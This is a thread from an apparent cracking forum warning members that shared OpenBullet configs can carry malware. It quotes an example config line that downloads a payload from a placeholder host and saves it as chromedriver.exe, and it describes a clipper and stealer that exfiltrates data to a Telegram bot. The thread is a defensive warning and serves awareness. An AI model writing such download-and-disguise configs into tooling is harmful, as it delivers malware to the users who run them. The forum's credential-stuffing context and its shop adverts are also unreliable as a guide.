Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 261605

Beware of malicious/infected configs

by Liars - 23 June, 2020 - 10:18 AM
This post is by a banned member (Rabye_Bouden) - Unhide
82
Posts
44
Threads
4 Years of service
#17
(23 June, 2020 - 10:18 AM)Ulysses Wrote: Show More
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.

The malware attack vector is a malicious GET request, and it looks like this:
Code:
REQUEST GET "https://site.com/config/API"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"

The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.

At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:

(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).

Last but not least, report malicious configs.

Ty For info
https://shoppy.gg/@Marouan1

BEST VPN SHOP WITH CHEAP PRICE 
Smart
This post is by a banned member (balant) - Unhide
This post is by a banned member (trufer) - Unhide
trufer  
Registered
19
Posts
5
Threads
4 Years of service
#19
amazing info . thx
This post is by a banned member (Ozirus) - Unhide
Ozirus  
Supreme
388
Posts
18
Threads
4 Years of service
#20
Thanks for the heads up sir!
 ⭐️[SALE] US/UK/WORLD FOOD, TV, STREAMING, EDUCATION, + MORE [MANY PAYMENT METHODS]⭐️ CLICK HERE TO VIEW SHOP
This post is by a banned member (alina666) - Unhide
alina666  
Infinity
124
Posts
66
Threads
5 Years of service
#21
Thank you so much, didn't hear of it before
This post is by a banned member (xARGIx) - Unhide
xARGIx  
Supreme
1.264
Posts
66
Threads
5 Years of service
#22
Thanks For Info  pepeokay
[Image: Banner.gif]
This post is by a banned member (Eternmium) - Unhide
This post is by a banned member (Shield) - Unhide

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 5 Guest(s)